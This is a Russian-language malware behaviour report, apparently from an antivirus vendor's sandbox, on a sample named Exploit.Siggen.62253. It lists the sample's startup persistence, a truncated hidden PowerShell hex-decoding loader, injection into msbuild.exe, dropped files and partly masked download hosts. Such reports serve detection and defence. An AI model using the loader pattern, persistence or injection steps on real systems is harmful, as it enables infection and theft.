Exploit.Siggen.62253

Техническая информация

Для обеспечения автозапуска и распространения

Создает или изменяет следующие файлы

%APPDATA%\microsoft\windows\start menu\programs\startup\rdpsign.url

Вредоносные функции

Запускает на исполнение (эксплоит)

'<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden function z55f9 {param($e1d1121)$z4ae77e='gb15b8d';$m94e7c='';for ($i=0; $i -lt $e1d1121.length;$i+=2){$d97ad=[convert]::ToByte($e1d1121.Substring($i,2),16);$m94e7c+=[char]...

Внедряет код в

следующие системные процессы:

%WINDIR%\microsoft.net\framework\v4.0.30319\msbuild.exe

Завершает или пытается завершить

следующие системные процессы:

%WINDIR%\microsoft.net\framework\v4.0.30319\msbuild.exe

Изменения в файловой системе

Создает следующие файлы

%TEMP%\tlgy0wob.0.cs
%TEMP%\cscf0b6.tmp
%TEMP%\cscf1ee.tmp
%TEMP%\resf20f.tmp
%TEMP%\resee84.tmp
%TEMP%\tl-pis3z.dll
%TEMP%\reseeb3.tmp
%TEMP%\-ee7n481.dll
%TEMP%\ettxa0uq.out
%TEMP%\resf0c7.tmp
%TEMP%\zrbrdtfg.dll
%TEMP%\tlgy0wob.dll
%TEMP%\ettxa0uq.dll
%LOCALAPPDATA%\microsoft\windows\<INETFILES>\content.word\~wrf{3f77868a-af43-4469-9a09-22d94bb210a6}.tmp
%APPDATA%\vf38cc.exe
%TEMP%\cscefcc.tmp
%TEMP%\csceea3.tmp
%TEMP%\cscee74.tmp
%TEMP%\-ee7n481.out
%TEMP%\-ee7n481.cmdline
%TEMP%\-ee7n481.0.cs
%TEMP%\zrbrdtfg.out
%TEMP%\zrbrdtfg.cmdline
%TEMP%\zrbrdtfg.0.cs
%TEMP%\resefdc.tmp
%TEMP%\ettxa0uq.cmdline
%TEMP%\ettxa0uq.0.cs
%TEMP%\tl-pis3z.out
%TEMP%\tl-pis3z.cmdline
%TEMP%\tl-pis3z.0.cs
%TEMP%\tlgy0wob.out
%TEMP%\tlgy0wob.cmdline
%HOMEPATH%\rdpsign\rdpsign.vbs
%HOMEPATH%\rdpsign\wudfhost.exe

Удаляет следующие файлы

%TEMP%\resee84.tmp
%TEMP%\tl-pis3z.dll
%TEMP%\tl-pis3z.pdb
%TEMP%\resefdc.tmp
%TEMP%\cscefcc.tmp
%TEMP%\tlgy0wob.pdb
%TEMP%\tlgy0wob.out
%TEMP%\tlgy0wob.cmdline
%TEMP%\ettxa0uq.pdb
%TEMP%\tlgy0wob.dll
%TEMP%\reseeb3.tmp
%TEMP%\csceea3.tmp
%TEMP%\ettxa0uq.out
%TEMP%\ettxa0uq.cmdline
%TEMP%\ettxa0uq.0.cs
%TEMP%\tl-pis3z.0.cs
%TEMP%\tlgy0wob.0.cs
%TEMP%\tl-pis3z.out
%TEMP%\zrbrdtfg.cmdline
%TEMP%\cscee74.tmp
%TEMP%\resf20f.tmp
%TEMP%\cscf1ee.tmp
%TEMP%\resf0c7.tmp
%TEMP%\cscf0b6.tmp
%TEMP%\zrbrdtfg.pdb
%TEMP%\zrbrdtfg.dll
%TEMP%\-ee7n481.cmdline
%TEMP%\zrbrdtfg.out
%TEMP%\zrbrdtfg.0.cs
%TEMP%\-ee7n481.pdb
%TEMP%\-ee7n481.dll
%TEMP%\-ee7n481.out
%TEMP%\-ee7n481.0.cs
%TEMP%\tl-pis3z.cmdline
%TEMP%\ettxa0uq.dll

Сетевая активность

TCP

Запросы HTTP GET

http://ve##u.live/don/don.exe
http://ch####p.dyndns.org/

UDP

DNS ASK ve##u.live
DNS ASK ch####p.dyndns.org

Другое

Создает и запускает на исполнение

'%APPDATA%\vf38cc.exe'
'<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden function z55f9 {param($e1d1121)$z4ae77e='gb15b8d';$m94e7c='';for ($i=0; $i -lt $e1d1121.length;$i+=2){$d97ad=[convert]::ToByte($e1d1121.Substring($i,2),16);$m94e7c+=[char]...' (со скрытым окном)
'%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\tlgy0wob.cmdline"' (со скрытым окном)
'%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\tl-pis3z.cmdline"' (со скрытым окном)
'%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\ettxa0uq.cmdline"' (со скрытым окном)
'%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\zrbrdtfg.cmdline"' (со скрытым окном)
'%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\-ee7n481.cmdline"' (со скрытым окном)
'%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RESEE84.tmp" "%TEMP%\CSCEE74.tmp"' (со скрытым окном)
'%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RESEEB3.tmp" "%TEMP%\CSCEEA3.tmp"' (со скрытым окном)
'%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RESEFDC.tmp" "%TEMP%\CSCEFCC.tmp"' (со скрытым окном)
'%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RESF0C7.tmp" "%TEMP%\CSCF0B6.tmp"' (со скрытым окном)
'%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RESF20F.tmp" "%TEMP%\CSCF1EE.tmp"' (со скрытым окном)

Запускает на исполнение

'%ProgramFiles%\microsoft office\office14\excel.exe' -Embedding
'%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\tlgy0wob.cmdline"
'%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\tl-pis3z.cmdline"
'%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\ettxa0uq.cmdline"
'%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\zrbrdtfg.cmdline"
'%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\-ee7n481.cmdline"
'%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RESEE84.tmp" "%TEMP%\CSCEE74.tmp"
'%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RESEEB3.tmp" "%TEMP%\CSCEEA3.tmp"
'%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RESEFDC.tmp" "%TEMP%\CSCEFCC.tmp"
'%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RESF0C7.tmp" "%TEMP%\CSCF0B6.tmp"
'%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RESF20F.tmp" "%TEMP%\CSCF1EE.tmp"
'%ProgramFiles%\microsoft office\office14\excelcnv.exe' -Embedding
'%WINDIR%\microsoft.net\framework\v4.0.30319\msbuild.exe'